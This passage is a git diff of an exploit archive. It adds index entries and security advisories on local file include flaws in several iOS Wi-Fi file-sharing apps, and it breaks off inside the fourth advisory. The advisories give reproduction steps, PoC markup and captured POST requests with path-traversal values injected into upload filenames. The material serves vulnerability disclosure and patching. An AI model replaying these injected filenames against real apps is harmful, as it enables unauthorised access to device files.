diff --git a/files.csv b/files.csv
index 4f17aa67f..7fc1e7d8a 100755
--- a/files.csv
+++ b/files.csv
@@ -18087,7 +18087,7 @@ id,file,description,date,author,platform,type,port
 20812,platforms/windows/remote/20812.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0
 20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0
 20814,platforms/windows/remote/20814.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0
-20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
+20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
 20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2)",2001-05-01,"dark spyrit",windows,remote,0
 20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3)",2005-02-02,styx,windows,remote,0
 20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4)",2001-05-01,"Cyrus The Great",windows,remote,0
@@ -30295,3 +30295,20 @@ id,file,description,date,author,platform,type,port
 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
 33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
 33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0
+33626,platforms/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80
+33627,platforms/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33628,platforms/ios/webapps/33628.txt,"Files Desk Pro v1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8081
+33629,platforms/ios/webapps/33629.txt,"Privacy Pro v1.2 HZ iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,56380
+33630,platforms/ios/webapps/33630.txt,"TigerCom My Assistant 1.1 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33631,platforms/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0
+33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0
+33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 'callback.snipshot.php' Arbitrary File Creation Vulnerability",2010-02-03,"Cory 
Marsh",php,webapps,0
+33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0
+33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0
+33639,platforms/php/webapps/33639.txt,"Joomla! EasyBook 2.0.0rc4 Component Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
+33640,platforms/windows/dos/33640.py,"AIMP <= 2.8.3 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2010-02-12,Molotov,windows,dos,0
+33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
+33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
+33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 Local File Include and Cross Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
diff --git a/platforms/ios/webapps/33627.txt b/platforms/ios/webapps/33627.txt
new file mode 100755
index 000000000..677696bdb
--- /dev/null
+++ b/platforms/ios/webapps/33627.txt
@@ -0,0 +1,208 @@
+Document Title:
+===============
+NG WifiTransfer Pro 1.1 - File Include Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1260
+
+
+Release Date:
+=============
+2014-04-28
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1260
+
+
+Common Vulnerability Scoring System:
+====================================
+6.5
+
+
+Product & Service Introduction:
+===============================
+The easiest way to transfer files between iPhones or with computers! WifiTransfer enables fast wireless file transfer between
+iPhones or with computers with a simple scan. WifiTransfer enables simple and ultra fast file transfer between iPhones over
+Wi-Fi networks. Without any additional setup, just a QRCode scan will do. The target iPhone doesn`t have to install WifiTransfer.
+An iPhone with an ARBITRARY scanner will do. (However, with WifiTransfer installed on the target iPhone, you will have better
+control on the transfer process.) In addition to transfer files between iPhone/iPad, you can also remotely manage files on your
+iPhone right from your desktop computer. Supported browsers: Safari, Chrome, FireFox, Internet Explorer.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-04-28: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Notable Group
+Product: WifiTransfer Pro - iOS Mobile Application 1.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
+commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
+`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
+in the `WifiTransfer File Management` listing context. The attacker is able to inject the local file include request by usage of the
+`wifi interface` or by a local privileged application user account via `file sync`(app).
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different
+local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security
+risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
+
+Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
+Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. + +Request Method(s): + [+] [POST] - Remote + [+] [SYNC] - Local + +Vulnerable Module(s): + [+] WifiTransfer File Management (UI) + +Vulnerable Function(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080/) + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by attackers without privileged application user account and low user interaction. +For security demonstration or to reproduce the file include web vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... + +1. Install the vulnerable wifi ios software app (https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784) +2. Start the server and activate the localhost wifi server +3. Open the wifi interface in a browser or console > http://localhost:8080/ +4. The the directory button to choose a file for a upload +5. Activate a session tamper to capture the request information to intercept +6. Click the upload button and inject your own path/file request inside of the filename value +7. Open the interface in the browser and the execution occurs in the file dir item listing context +8. Successful reproduce of the security vulnerability via wifi user interface! + +Note: The inject is also possible via sync + +1. Add a file in the device app interface +2. Inject the path request as payload in combination with script code and save +3. Activate the localhost wifi interface (web-server) +4. Open the interface in the browser and the execution occurs in the file dir item listing context +5. Successful reproduce of the security vulnerability via app sync! + + +PoC: + + + + + +
NameAction
<./-[LOCAL FILE INCLUDE VULNERABILITY!].png.png
Download
+ + + + +--- PoC Session Logs [POST] --- +Status: 302[Found] +POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------2128355697111 +Content-Disposition: form-data; name="newfile"; filename="./-[LOCAL FILE INCLUDE VULNERABILITY!].png" +Content-Type: image/png + + +Reference(s): +http://localhost:8080/ +http://localhost:8080/files + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerable filename input value in the upload POST method request. +Filter and encode also the name value output in the wifi interface file dir listing. +Setup a restriction of the filename input and disallow data names with special chars. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the wifi interface is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + 
diff --git a/platforms/ios/webapps/33628.txt b/platforms/ios/webapps/33628.txt new file mode 100755 index 000000000..8d4ba698e --- /dev/null +++ b/platforms/ios/webapps/33628.txt 
@@ -0,0 +1,285 @@
+Document Title:
+===============
+Files Desk Pro v1.4 iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1266
+
+
+Release Date:
+=============
+2014-05-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1266
+
+
+Common Vulnerability Scoring System:
+====================================
+6.7
+
+
+Product & Service Introduction:
+===============================
+FileDesk is iPhone/iPad app for managing your files. Read differect kind of files,Create PDFs with different contents, Make your
+documents/files private,Share Your files over WiFi. File Desk - A digital desk for your files. Manage your Documents/Files With File Desk.
+
+(Copy of the Homepage: https://itunes.apple.com/ag/app/file-desk-pro-documents-manager/id600550320 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Files Desk Pro v1.4 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-16: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+LiveBird Technologies Private Limited
+Product: Files Desk Pro & Lite 1.4
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Files Desk Pro v1.4 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
+specific path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. 
Remote attackers are able to inject own files +with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path +include execution occcurs in the `index file dir` list of the `filesdesk` manager. The attacker is able to inject the local file +include request by usage of the `wifi interface` or by a local privileged application user accounts via `file sync`(app). + +Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to +execute different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the +request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high with a +cvss (common vulnerability scoring system) count of 6.7. + +Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user +account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application +or connected device component compromise. + +Request Method(s): + [+] [POST] - Remote + [+] [SYNC] - Local + +Vulnerable Module(s): + [+] FilesDesk Wifi (UI) + +Vulnerable Function(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8081/) + + +Proof of Concept (PoC): +======================= +The local file/path include web vulnerability can be exploited local attackers without privileged application user account and without user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce ... +1. Install the FileDesk mobile application to your iOS device (ipad or iphone) +2. Start the local wifi web-server and share some random files +3. 
Connect with another remote computer to the local web-server interface url > web.localhost:8081 +4. Start a session tamper and choose a random file to upload +5. Submit the upload form and intercept in the session to change the vulnerable filename value to a local device file/path +Note: Can also be combined with script codes and html tags +6. Refresh the index and the execution of the malicious request occurs in the index file dir list (name value) +7. Successful reproduce of the file include web vulnerability! + + +PoC: FilesDesk Index + + + + + + +
NameDelete
<[LOCAL FILE/PATH INCLUDE + +VULNERABILITY!]">.png
+ + + + +Vulnerable Source: Upload Script + + + + +--- PoC Session Logs [POST] --- +Status: 302[Found] +POST http://192.168.2.104:8081/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html] + Request Header: + Host[192.168.2.104:8081] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:8081/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------147491436412682 +Content-Disposition: form-data; name="newfile"; filename="%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png" +Content-Type: image/png + + +Status: 200[OK] +GET http://192.168.2.104:8081/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2953] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.104:8081] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:8081/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[2953] + Date[Do., 15 Mai 2014 14:27:35 GMT] + + + + +Status: 200[OK] +GET http://192.168.2.104:8081/files?Thu%20May%2015%202014%2016:14:57%20GMT+0200 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[39] Mime Type[text/plain] + Request Header: + Host[192.168.2.104:8081] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[application/json, text/javascript, */*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://192.168.2.104:8081/] + Connection[keep-alive] + Response Header: + 
Accept-Ranges[bytes] + Content-Length[39] + Cache-Control[private, max-age=0, must-revalidate] + Content-Type[text/plain; charset=utf-8] + Date[Do., 15 Mai 2014 14:27:37 GMT] + + + + +Status: 200[OK] +GET http://192.168.2.104:8081/%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.104:8081] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:8081/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[0] + Date[Do., 15 Mai 2014 14:27:38 GMT] + + + + +Reference(s): +http://web.localhost:8081/[x] +http://web.localhost:8081/files + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the filename value in the upload POST method request. +Disallow special chars for files and foldernames and restrict the user input. Encode and parse also the vulnerable name output value. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the filename value is estimated as high(-). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 
2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/ios/webapps/33629.txt b/platforms/ios/webapps/33629.txt new file mode 100755 index 000000000..458d58ef6 --- /dev/null +++ b/platforms/ios/webapps/33629.txt 
@@ -0,0 +1,197 @@
+Document Title:
+===============
+Privacy Pro v1.2 HZ iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1267
+
+
+Release Date:
+=============
+2014-05-23
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1267
+
+
+Common Vulnerability Scoring System:
+====================================
+6.6
+
+
+Product & Service Introduction:
+===============================
+First of all,you need to enter the password two times that means to enter the password and confirm password,please remember the password, so as
+to avoid unnecessary trouble. Personal information manager can provide personal information service personal for you, and provide the password
+verification to ensure the privacy and security of your, include private account, video, pictures, books, telephone, recording, encryption and
+decryption , memos and other functions, and the personal information manager can support WiFi data backup and recovery, we hope it can give
+quite a lot convenient to your life.
+
+( Copy of the Homepage: https://itunes.apple.com/de/app/privacy-account-video-picture/id790084948 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Privacy Pro v1.2 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Huang Zhuan
+Product: Privacy [Account Video Picture Books Record] - iOS Mobile Web Application 1.2
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Privacy Pro v1.2 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
+specific path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with
+malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include
+execution occcurs not like regular in the index list but inside of the upload formular message filename context. The attacker is able
+to inject the local file include request by usage of the `wifi interface`. The affected service inside of the application is only the
+privacy manager `wifi revover data` module. (localhost:56380 -restore)
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
+different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
+inject is POST.
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
+count of 6.6. 
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application +user account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or +connected device component compromise. + + +Request Method(s): + [+] [POST] + +Vulnerable Service(s): + [+] WiFi Restore Data + +Vulnerable Module(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:56380/) + + +Proof of Concept (PoC): +======================= +The local file/path include web vulnerability can be exploited by local network attackers with low user interaction. For security demonstration or +to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Source +../.[FILE/PATH INCLUDE VULNERABILITY!] Upload successfully! + + +--- PoC Session Logs [POST] --- +POST http://localhost:56380/upload Load Flags[LOAD_ONLY_FROM_CACHE LOAD_FROM_CACHE VALIDATE_NEVER LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[-1] Mime Type[unbekannt] + Request Header: + Host[localhost:56380] + User-Agent +[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:56380/index.html] + POST-Daten: + POST_DATA[-----------------------------57581386217946 +Content-Disposition: form-data; name="upload_file"; filename="../.[LOCAL FILE/PATH INCLUDE VULNERABILITY!].jpg" +Content-Type: image/jpg + +Response Header: +Status: 200[OK] +GET http://192.168.2.104:56380/index.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1084] Mime Type[text/html] + Request Header: + Host[192.168.2.104:56380] + User-Agent +[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + 
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Response Header: + Content-Length[1084] + Content-Type[text/html] + + +Reference(s): +http://localhost:56380/index.html (Wifi Restore Data) +http://localhost:56380/upload (Vulnerable File) + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure encode and parse of the upload notification message context and input value. +Restrict the upload input and validate the context next to the data restore. + + +Security Risk: +============== +The security risk of the local file/path include web vulnerability is estimated as high(-). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. 
+ +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/ios/webapps/33630.txt b/platforms/ios/webapps/33630.txt new file mode 100755 index 000000000..aee98c718 --- /dev/null +++ b/platforms/ios/webapps/33630.txt 
@@ -0,0 +1,220 @@
+Document Title:
+===============
+TigerCom My Assistant v1.1 iOS - File Include Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1268
+
+
+Release Date:
+=============
+2014-05-23
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1268
+
+
+Common Vulnerability Scoring System:
+====================================
+6.9
+
+
+Product & Service Introduction:
+===============================
+Folder manager, Convenient transmission, Document browsing, Compression & Decompression, Password-protected.
+
+- Support multi-level directory management
+- Add new folder
+- Open camera, store photos and recording video
+- Photos and video high fidelity storage
+- Import photos and videos from album
+- Export photos and videos to your album
+- Copy, paste, delete, Email attachments
+- Support multiple files operation
+- Support sorting by name and type
+- Icon shows file type
+
+Convenient transmission:
+- Wifi Transmission, you can share files between iphone, ipad and computer
+- Current open folder sharing, better protect your privacy
+- USB transfer and share files via Itunes
+
+Document browsing:
+- Txt document browsing and editing (txt)
+- PDF document browsing (pdf)
+- Word browsing (doc, docx)
+- Excel browsing (xls, xlsx)
+- PowerPoint browsing (ppt, pptx)
+- Picture browsing (png, jpg, jpeg, jpe)
+- Video player (mov, mp4, m4v, mpv, 3pg)
+- Audio player (mp3, wav, aif)
+
+Safty:
+- Intelligent encryption, protect the folder
+- Password-protected switch
+
+( Copy of the Homepage: https://itunes.apple.com/en/app/my-assistant-free/id626680229 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official TigerCom My Assistant v1.1 iOS mobile web-application.
+ + +Vulnerability Disclosure Timeline: +================================== +2014-05-23: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +TigerCom +Product: My Assistant Free 1.1 + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official TigerCom My Assistant v1.1 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific +path commands to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `UPLOAD_FILE_TO_FOLDER` (uploadfile) module. Remote attackers are able +to inject own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local +file/path include execution occcurs in the index file/folder list context in the vulnerable 